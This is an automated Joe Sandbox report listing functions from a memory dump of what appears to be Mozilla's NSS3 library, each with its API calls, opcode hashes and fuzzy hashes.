Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 185c613ea651363058e662ead888cc51e2dd6bd01095f9c0be3194c99d276fbc
Instruction ID: b5607a6d8b6eb8dd2ccc1709ca6656f1bb8f72ac2fed79c1be957535f1c222d7
Opcode Fuzzy Hash: 185c613ea651363058e662ead888cc51e2dd6bd01095f9c0be3194c99d276fbc
Instruction Fuzzy Hash: 062128B29092049BFF208E188E01B9A7BE4AF8573CF144728EC589B781E731D54887B3

Function 6C888A50 Relevance: 9.1, APIs: 6, Instructions: 84networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6C888A8F

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

htons.WSOCK32(?), ref: 6C888ACB
PR_GetCurrentThread.NSS3(?), ref: 6C888AE2
htons.WSOCK32(?), ref: 6C888B1E
htonl.WSOCK32(7F000001,?), ref: 6C888B3B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: htons$CurrentModulePageSizeThreadhtonl
String ID:
API String ID: 3860140138-0
Opcode ID: 472c17f4938473d92c639cc7f8d5ff7fbe9e1e23db3763cf02a0f173d5554ca8
Instruction ID: bcc43eedab343cacf2d47b5eddc5dcb0d7f335e9f98c6016333662905e88e851
Opcode Fuzzy Hash: 472c17f4938473d92c639cc7f8d5ff7fbe9e1e23db3763cf02a0f173d5554ca8
Instruction Fuzzy Hash: 3021CCB4D56795AAC3308F398A41566B2F5AF95708B21DE2FE8D983E20F734A4C0C395

Function 6C7FEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7FEE85
realloc.MOZGLUE(731E398C,?), ref: 6C7FEEAE
PORT_Alloc_Util.NSS3(?), ref: 6C7FEEC5

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

htonl.WSOCK32(?), ref: 6C7FEEE3
htonl.WSOCK32(00000000,?), ref: 6C7FEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C7FEF01

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 98070ecdae83e1dfc767fc94a3895d6bcc3d3d947fcd11721ae2fe30d4b76f36
Instruction ID: 3413cae97319cb2a6a91c7f58506d456fdd1338e72f39c4192caf87e500ddb5b
Opcode Fuzzy Hash: 98070ecdae83e1dfc767fc94a3895d6bcc3d3d947fcd11721ae2fe30d4b76f36
Instruction Fuzzy Hash: 5621D671A002189FDB209F28DDC475A77A8EF45358F158139EC199B741D330ED15C7E2

Function 6C7AEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7AEE49

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7AEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C7AEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C7AEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7AEEB3

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: a5b26b4bfb7332f09be47131540e118198577f02cc4bd3e88d8f2258f1c3a253
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: F82105B6A04215ABEB019E58ED89EABB7ACEF45708F040274FD049B301E771DC2587F1

Function 6C7D0AA0 Relevance: 9.1, APIs: 6, Instructions: 79COMMON

Download Yara Rule

APIs

PL_HashTableDestroy.NSS3(?,?,?,6C787F62,00000000,00000000,?,?,?,6C7880DD), ref: 6C7D0AAE
PL_HashTableDestroy.NSS3(?,?,?,6C787F62,00000000,00000000,?,?,?,6C7880DD), ref: 6C7D0ACA
PL_HashTableDestroy.NSS3(?,?,?,6C787F62,00000000,00000000,?,?,?,6C7880DD), ref: 6C7D0B05
PORT_FreeArena_Util.NSS3(?,00000000,?,?,6C787F62,00000000,00000000,?,?,?,6C7880DD), ref: 6C7D0B24
free.MOZGLUE(?,?,?,6C787F62,00000000,00000000,?,?,?,6C7880DD), ref: 6C7D0B3C
memset.VCRUNTIME140(6C8D24E4,00000000,000005B0,?,?,6C787F62,00000000,00000000,?,?,?,6C7880DD), ref: 6C7D0BC2

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DestroyHashTable$Arena_FreeUtilfreememset
String ID:
API String ID: 4033302747-0
Opcode ID: a04a99c0a78e0f07c9b41bac4cfb1341e8710c6836198eea926726732a7deea3
Instruction ID: 271a464523b0299f38d6c76806bad591bdc304185cf9b547507927b3329c90df
Opcode Fuzzy Hash: a04a99c0a78e0f07c9b41bac4cfb1341e8710c6836198eea926726732a7deea3
Instruction Fuzzy Hash: D921FBF0B042419EEF70DB269E0D7033AB9B70634DF065175D809D2A41E739B958CBE1

Function 6C7C8A60 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C7761C4,?,6C775F9C,00000000), ref: 6C7C8A81
TlsGetValue.KERNEL32(?,?,?,6C775F9C,00000000), ref: 6C7C8A9E
EnterCriticalSection.KERNEL32(?,?,?,?,6C775F9C,00000000), ref: 6C7C8AB7
PR_Unlock.NSS3(?,?,?,?,?,6C775F9C,00000000), ref: 6C7C8AD2
PR_NotifyCondVar.NSS3(?,?,?,?,?,6C775F9C,00000000), ref: 6C7C8B05
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,6C775F9C,00000000), ref: 6C7C8B18

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CondNotifyValue$CriticalEnterSectionUnlock
String ID:
API String ID: 1007705821-0
Opcode ID: 95d2426795be84bb222fac1cc450d2386330ff413045ab7712e8c151fb577bb4
Instruction ID: 328f16e35ee9c8d5ec9109cd76aa838219ea29494c90e8533b7b06ec33936afb
Opcode Fuzzy Hash: 95d2426795be84bb222fac1cc450d2386330ff413045ab7712e8c151fb577bb4
Instruction Fuzzy Hash: 632130B46047168FDB20AF39C248659B7F4BF1535DF054A3AD89587F41E730E898CB92

Function 6C7C4820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C7C4EB8,?), ref: 6C7C4884

Part of subcall function 6C7C8800: TlsGetValue.KERNEL32(?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8821
Part of subcall function 6C7C8800: TlsGetValue.KERNEL32(?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C883D
Part of subcall function 6C7C8800: EnterCriticalSection.KERNEL32(?,?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8856
Part of subcall function 6C7C8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C7C8887
Part of subcall function 6C7C8800: PR_Unlock.NSS3(?,?,?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7C4EB8,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7C4EB8,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7C48A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7C48B8

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: 5a5b6f8b950b70184cf73fed262d082abe310cf8654c192291a2518a222e264e
Instruction ID: 0b97de1a667ad6d0d74b7a45f8dbcdf2a108a51714b03021c56ef7bd24caee12
Opcode Fuzzy Hash: 5a5b6f8b950b70184cf73fed262d082abe310cf8654c192291a2518a222e264e
Instruction Fuzzy Hash: 1D219576B002429FEF205E66DEC456677F8AF1675DB040535DE0547A02E721F814D7E2

Function 6C7889E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7888AE,-00000008), ref: 6C788A04
EnterCriticalSection.KERNEL32(?), ref: 6C788A15
memset.VCRUNTIME140(6C7888AE,00000000,00000132), ref: 6C788A27
PR_Unlock.NSS3(?), ref: 6C788A35
memset.VCRUNTIME140(6C7888AE,00000000,00000132,00000000,-00000008,00000000,?,?,6C7888AE,-00000008), ref: 6C788A45
free.MOZGLUE(6C7888A6,?,6C7888AE,-00000008), ref: 6C788A4E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memset$CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 65992600-0
Opcode ID: 9d85c41615ae1d28abbbb4c38b3578279f5682c15b57feb56d7e495d0e8eb6e1
Instruction ID: 21a92114c5ffe801a72e53c2c5a2b8e728da7fe3159d3aea0794803d1c49bbd8
Opcode Fuzzy Hash: 9d85c41615ae1d28abbbb4c38b3578279f5682c15b57feb56d7e495d0e8eb6e1
Instruction Fuzzy Hash: 68112BB5E013019FEB109F68DD88A5ABB78FF05718F000536EA0597A41E731EA54C7E2

Function 6C788A90 Relevance: 9.1, APIs: 6, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 6C788FE0: PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C790710), ref: 6C788FF1
Part of subcall function 6C788FE0: calloc.MOZGLUE(00000001,00000000,?,?,6C790710), ref: 6C78904D
Part of subcall function 6C788FE0: memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C790710), ref: 6C789066
Part of subcall function 6C788FE0: PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C790710), ref: 6C789078

TlsGetValue.KERNEL32 ref: 6C788AC1
EnterCriticalSection.KERNEL32 ref: 6C788AD6
PL_FinishArenaPool.NSS3 ref: 6C788AE5
PR_Unlock.NSS3 ref: 6C788AF7
DeleteCriticalSection.KERNEL32 ref: 6C788B02
free.MOZGLUE ref: 6C788B0E

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$calloc$CriticalPrivateSectionThread$ArenaDeleteEnterFinishPoolUnlockfreememcpy
String ID:
API String ID: 417085867-0
Opcode ID: 7f3143dcd57377c22255fc48920285cc5e9dd3636ef207ae926060d7e75b2770
Instruction ID: aa44787f2b09da4ed79d20daa886068efb017952e5703abc08c768124c021a2a
Opcode Fuzzy Hash: 7f3143dcd57377c22255fc48920285cc5e9dd3636ef207ae926060d7e75b2770
Instruction Fuzzy Hash: D1117CB15056058BDB10BF78C18D66ABBF4FF41348F01497AD9848BB01EB34E599CBD2

Function 6C888910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C88892E

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

PR_Lock.NSS3 ref: 6C888950

Part of subcall function 6C839BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C761A48), ref: 6C839BB3
Part of subcall function 6C839BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C761A48), ref: 6C839BC8

getprotobynumber.WSOCK32(?), ref: 6C888959
GetLastError.KERNEL32(?), ref: 6C888967
PR_GetCurrentThread.NSS3(?,?), ref: 6C88896F
PR_Unlock.NSS3(?,?), ref: 6C88898A

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
String ID:
API String ID: 4143355744-0
Opcode ID: 1af0c88ef0eb33b4a5e4ffa4a6671b80d4a90f0cb952b3b67945c7bac24fa3f6
Instruction ID: 3bf00260c2442d603dc1281bb9afe71bce2d439f84804dad9fbdae4b869ea47a
Opcode Fuzzy Hash: 1af0c88ef0eb33b4a5e4ffa4a6671b80d4a90f0cb952b3b67945c7bac24fa3f6
Instruction Fuzzy Hash: B611E972A151309BCB305FB99E0458A7764AF45338F064776EC0997F61D730AC04C7C6

Function 6C78AB10 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(D958E852,6C791397,5B5F5EC0,?,?,6C78B1EE,2404110F,?,?), ref: 6C78AB3C
free.MOZGLUE(D958E836,?,6C78B1EE,2404110F,?,?), ref: 6C78AB49
DeleteCriticalSection.KERNEL32(5D5E6C98), ref: 6C78AB5C
free.MOZGLUE(5D5E6C8C), ref: 6C78AB63
DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C78AB6F
free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C78AB76

Part of subcall function 6C7BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C7BF854
Part of subcall function 6C7BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C7BF868
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C7BF882
Part of subcall function 6C7BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C7BF889
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C7BF8A4
Part of subcall function 6C7BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C7BF8AB
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C7BF8C9
Part of subcall function 6C7BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C7BF8D0

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 1a9fbe252efdaa87b0a86e9e34cbde852d9d43e543dfea5901e2ea36a409f599
Instruction ID: aa77696f46d1b183590d9d9dbca7a72752df807c06fe52fc558b38244ba42136
Opcode Fuzzy Hash: 1a9fbe252efdaa87b0a86e9e34cbde852d9d43e543dfea5901e2ea36a409f599
Instruction Fuzzy Hash: DF01F1B2601605ABCA11AFA5DC8888B7778EE41B383040539EA0983A00E336F516CBE1

Function 6C806840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6C80AA9B,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C806846

Part of subcall function 6C761770: calloc.MOZGLUE(00000001,0000019C,?,6C7615C2,?,?,?,?,?,00000001,00000040), ref: 6C76178D

PR_NewMonitor.NSS3(00000000,?,6C80AA9B,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C806855

Part of subcall function 6C7C8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C7755D0,00000000,00000000), ref: 6C7C868B
Part of subcall function 6C7C8680: PR_NewLock.NSS3(00000000,00000000), ref: 6C7C86A0
Part of subcall function 6C7C8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C7C86B2
Part of subcall function 6C7C8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C7C86C8
Part of subcall function 6C7C8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C7C86E2
Part of subcall function 6C7C8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C7C86EC
Part of subcall function 6C7C8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C7C8700

PR_NewMonitor.NSS3(?,6C80AA9B,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C80687D

Part of subcall function 6C761770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7618DE
Part of subcall function 6C761770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7618F1

PR_NewMonitor.NSS3(?,6C80AA9B,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C80688C

Part of subcall function 6C761770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7618FC
Part of subcall function 6C761770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C76198A

PR_NewLock.NSS3 ref: 6C8068A5

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PR_NewLock.NSS3 ref: 6C8068B4

Part of subcall function 6C8398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C839946
Part of subcall function 6C8398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6F16B7,00000000), ref: 6C83994E
Part of subcall function 6C8398D0: free.MOZGLUE(00000000), ref: 6C83995E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: f1cef0d60f243f417e204ffb38c656d51b96b2f40c87d137c43799d4d2bd7578
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
